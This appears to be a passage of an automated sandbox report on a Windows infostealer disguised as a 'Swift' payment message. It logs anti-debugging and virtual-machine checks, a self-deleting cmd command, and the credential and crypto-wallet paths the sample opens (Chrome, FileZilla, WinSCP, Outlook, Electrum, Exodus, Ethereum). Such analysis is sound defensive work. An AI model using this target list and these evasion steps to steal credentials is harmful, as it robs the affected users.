Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF06AF rdtsc 1_2_02AF06AF
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_004065C5 FindFirstFileW,FindClose, 1_2_004065C5
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405990
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00402862 FindFirstFileW, 1_2_00402862
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe API call chain: ExitProcess graph end node
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060176873.0000000001825000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9^
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_10001B18
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF06AF rdtsc 1_2_02AF06AF
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AFC4B4 mov eax, dword ptr fs:[00000030h] 1_2_02AFC4B4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF688B mov eax, dword ptr fs:[00000030h] 1_2_02AF688B
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B1345E mov eax, dword ptr fs:[00000030h] 1_2_02B1345E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF692A mov eax, dword ptr fs:[00000030h] 1_2_02AF692A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF6927 mov eax, dword ptr fs:[00000030h] 1_2_02AF6927
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B11118 mov eax, dword ptr fs:[00000030h] 1_2_02B11118
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B0FF3F CreateFileA,LdrLoadDll, 1_2_02B0FF3F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403373

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000004.00000003.8040635695.000000001D9B8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.8078319161.000000001D460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.8040702551.000000001D9BC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Swift Mesaj#U0131#09971.exe PID: 3172, type: MEMORYSTR
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\ Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt Jump to behavior
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: >%appdata%\Electrum-LTC\wallets\Electrum\wallets\tlooka\\ZxcvbnData\Login Datajsondll
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: >%appdata%\Electrum-LTC\wallets\Electrum\wallets\tlooka\\ZxcvbnData\Login Datajsondll
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Exodus\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Exodus\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: >%appdata%\Electrum-LTC\wallets\Electrum\wallets\tlooka\\ZxcvbnData\Login Datajsondll
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: Yara match File source: 4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Swift Mesaj#U0131#09971.exe PID: 3172, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs